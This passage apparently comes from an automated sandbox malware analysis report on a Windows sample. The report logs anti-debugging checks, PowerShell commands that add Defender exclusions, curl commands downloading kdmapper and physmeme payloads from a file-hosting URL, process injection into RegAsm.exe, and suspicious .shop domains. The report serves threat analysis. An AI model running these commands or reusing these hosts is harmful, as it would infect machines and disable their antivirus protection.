                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614BD0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614760
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00627DEE mov eax, dword ptr fs:[00000030h]5_2_00627DEE
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF786614BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF786614BD0
                                Source: C:\Edge\msedge.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\WmiPrvSE.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662D730 SetUnhandledExceptionFilter,0_2_00007FF78662D730
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662D588 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF78662D588
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78662CE38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF78662CE38
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0061F838
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061F9D5 SetUnhandledExceptionFilter,5_2_0061F9D5
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0061FBCA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00628EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00628EBD
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeCode function: 9_2_02EC2129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,9_2_02EC2129
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strappystyio.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coursedonnyre.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fossillargeiw.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tendencerangej.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appleboltelwk.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tearrybyiwo.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: captainynfanw.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: surveriysiop.shop
                                Source: physmeme.exe, 00000009.00000002.1524140156.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tiddymarktwo.shop
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FCB008Jump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: 0_2_00007FF78661ECD0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,0_2_00007FF78661ECD0
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\WmiPrvSE.exe "C:\Users\user\AppData\Local\WmiPrvSE.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0061F654 cpuid 5_2_0061F654
                                Source: C:\Users\user\Desktop\seoI30IZZr.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF78662D960
                                Source: C:\Windows\Speech\kdmapper.exeCode function: GetLocaleInfoW,GetNumberFormatW,5_2_0061AF0F
                                Source: C:\Windows\Speech\physmeme.exeQueries volume information: C:\Windows\Speech\physmeme.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Edge\msedge.exe VolumeInformationJump to behavior
                                Source: C:\Edge\msedge.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
